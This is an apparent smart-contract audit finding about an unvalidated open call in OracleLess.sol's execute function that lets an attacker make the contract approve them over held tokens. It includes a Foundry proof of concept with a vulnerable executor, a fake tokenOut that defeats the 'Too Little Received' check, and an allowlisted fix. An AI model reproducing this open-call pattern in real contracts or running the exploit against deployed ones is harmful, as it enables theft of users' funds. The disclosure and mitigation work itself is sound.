
Formal Cornflower Halibut - Open call in OracleLess.sol can be used for unauthorized calling #891

Open
sherlock-admin3 opened this issue Dec 9, 2024 · 0 comments

@sherlock-admin3
Contributor

Formal Cornflower Halibut

High

Open call in OracleLess.sol can be used for unauthorized calling

Summary

Users can fill an OracleLess order with any pending order's ERC20 address and use the open call in OracleLess::execute, by filling the order through fillOrder, to execute approve and steal all the staked funds.

Root Cause

There is no data validation in fillOrder, which can be used to pass arbitrary data to the OracleLess::execute function, and this function performs an open call:

    function execute(
        address target,
        bytes calldata txData,
        Order memory order
    ) internal returns (uint256 amountOut, uint256 tokenInRefund) {
        //update accounting
        uint256 initialTokenIn = order.tokenIn.balanceOf(address(this));
        uint256 initialTokenOut = order.tokenOut.balanceOf(address(this));

        //approve (target is caller-supplied and never validated)
        order.tokenIn.safeApprove(target, order.amountIn);

        //perform the call (arbitrary target, arbitrary calldata, msg.sender == this contract)
        (bool success, bytes memory reason) = target.call(txData);

        if (!success) {
            revert TransactionFailed(reason);
        }

        uint256 finalTokenIn = order.tokenIn.balanceOf(address(this));
        require(finalTokenIn >= initialTokenIn - order.amountIn, "over spend");
        uint256 finalTokenOut = order.tokenOut.balanceOf(address(this));

        require(
            finalTokenOut - initialTokenOut > order.minAmountOut,
            "Too Little Received"
        );

        amountOut = finalTokenOut - initialTokenOut;
        tokenInRefund = order.amountIn - (initialTokenIn - finalTokenIn);
    }

Internal pre-conditions

No response

External pre-conditions

No response

Attack Path

1. Attacker checks for the highest staked tokens in OracleLess or any ERC20
2. Then executes a fillOrder function call with txData calling the approve function on any ERC-20 token address passed as the target parameter, authorizing the attacker's address to spend the funds

Impact

Stealing of funds

PoC

No response

Mitigation

No response
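The primitive described in the report, reconstructed as an added Foundry harness. This is example code, not code from the audited repository or from the reporter: only the body of `execute` mirrors the function quoted above (with a plain `approve` in place of `safeApprove`). The `fillOrder` wrapper, the `OpenCallExecutor` and `GuardedExecutor` contracts, the `MockToken`, and the `TickingToken` are all assumptions made for the harness. In particular, the report does not say how the "Too Little Received" check on `tokenOut` is satisfied; the harness gets past it with a constructed `tokenOut` whose reported balance rises as gas is consumed, which is an assumption of this example and not a finding on the page. The second test shows one hardening, an allowlisted target that may not be either of the order's tokens, offered as a suggestion rather than as the project's fix.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Added example, not code from the audited repository. Only `execute` mirrors the
// reported function; every other name here is an assumption made for the harness.
import {Test} from "forge-std/Test.sol";

interface IERC20 {
    function balanceOf(address account) external view returns (uint256);
    function approve(address spender, uint256 amount) external returns (bool);
}

// Minimal token standing in for the ERC20 whose funds the executor holds.
contract MockToken is IERC20 {
    mapping(address => uint256) public balanceOf;
    mapping(address => mapping(address => uint256)) public allowance;
    function mint(address to, uint256 amount) external { balanceOf[to] += amount; }
    function approve(address spender, uint256 amount) external returns (bool) {
        allowance[msg.sender][spender] = amount; // msg.sender is whoever calls: here, the executor itself
        return true;
    }
}

// Constructed test double for the order's tokenOut: its reported balance grows as gas is
// consumed, so the "Too Little Received" check passes although no real token moves.
// The report does not discuss that check; this double is an assumption of the harness.
contract TickingToken {
    function balanceOf(address) external view returns (uint256) { return type(uint256).max - gasleft(); }
}

contract OpenCallExecutor {
    struct Order { IERC20 tokenIn; IERC20 tokenOut; uint256 amountIn; uint256 minAmountOut; }
    error TransactionFailed(bytes reason);

    // Hypothetical stand-in for fillOrder: `target` and `txData` are forwarded unchecked.
    function fillOrder(Order calldata order, address target, bytes calldata txData)
        external virtual returns (uint256, uint256)
    {
        return execute(target, txData, order);
    }

    // Same accounting as the reported execute(); plain approve() replaces safeApprove().
    function execute(address target, bytes calldata txData, Order memory order)
        internal returns (uint256 amountOut, uint256 tokenInRefund)
    {
        uint256 initialTokenIn = order.tokenIn.balanceOf(address(this));
        uint256 initialTokenOut = order.tokenOut.balanceOf(address(this));
        order.tokenIn.approve(target, order.amountIn);
        (bool success, bytes memory reason) = target.call(txData); // open call: any target, any calldata
        if (!success) revert TransactionFailed(reason);
        uint256 finalTokenIn = order.tokenIn.balanceOf(address(this));
        require(finalTokenIn >= initialTokenIn - order.amountIn, "over spend");
        uint256 finalTokenOut = order.tokenOut.balanceOf(address(this));
        require(finalTokenOut - initialTokenOut > order.minAmountOut, "Too Little Received");
        amountOut = finalTokenOut - initialTokenOut;
        tokenInRefund = order.amountIn - (initialTokenIn - finalTokenIn);
    }
}

// Hardened variant (a suggestion, not the project's fix): only an allowlisted router may be
// called, and the router must never be one of the order's tokens.
contract GuardedExecutor is OpenCallExecutor {
    mapping(address => bool) public allowedTarget;
    constructor(address router) { allowedTarget[router] = true; }
    function fillOrder(Order calldata order, address target, bytes calldata txData)
        external override returns (uint256, uint256)
    {
        require(allowedTarget[target], "target not allowed");
        require(target != address(order.tokenIn) && target != address(order.tokenOut), "target is a token");
        return execute(target, txData, order);
    }
}

contract OpenCallTest is Test {
    address attacker = makeAddr("attacker");
    MockToken victim = new MockToken();

    // Attacker-supplied order: tokenIn is the token whose funds are parked in the executor.
    function attackerOrder() internal returns (OpenCallExecutor.Order memory) {
        return OpenCallExecutor.Order({
            tokenIn: IERC20(address(victim)), tokenOut: IERC20(address(new TickingToken())),
            amountIn: 0, minAmountOut: 0
        });
    }

    function test_openCallLetsFillerApproveItself() public {
        OpenCallExecutor executor = new OpenCallExecutor();
        victim.mint(address(executor), 1_000e18); // constructed: funds parked for other users' orders
        OpenCallExecutor.Order memory order = attackerOrder();
        // target = the victim token itself, calldata = approve(attacker, max); the executor is msg.sender
        bytes memory txData = abi.encodeCall(IERC20.approve, (attacker, type(uint256).max));
        vm.prank(attacker);
        executor.fillOrder(order, address(victim), txData);
        assertEq(victim.allowance(address(executor), attacker), type(uint256).max);
    }

    function test_guardedExecutorRejectsTokenAsTarget() public {
        GuardedExecutor guarded = new GuardedExecutor(makeAddr("router"));
        victim.mint(address(guarded), 1_000e18);
        OpenCallExecutor.Order memory order = attackerOrder();
        bytes memory txData = abi.encodeCall(IERC20.approve, (attacker, type(uint256).max));
        vm.expectRevert("target not allowed");
        vm.prank(attacker);
        guarded.fillOrder(order, address(victim), txData);
        assertEq(victim.allowance(address(guarded), attacker), 0);
    }
}
```

Run with `forge test -vv` in a project that has forge-std installed. The first test passes the open-call executor's own accounting checks while leaving the attacker with an unlimited allowance over the executor's balance of the victim token, which is exactly what the report's attack path relies on; the guarded variant rejects the same input before any external call is made.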
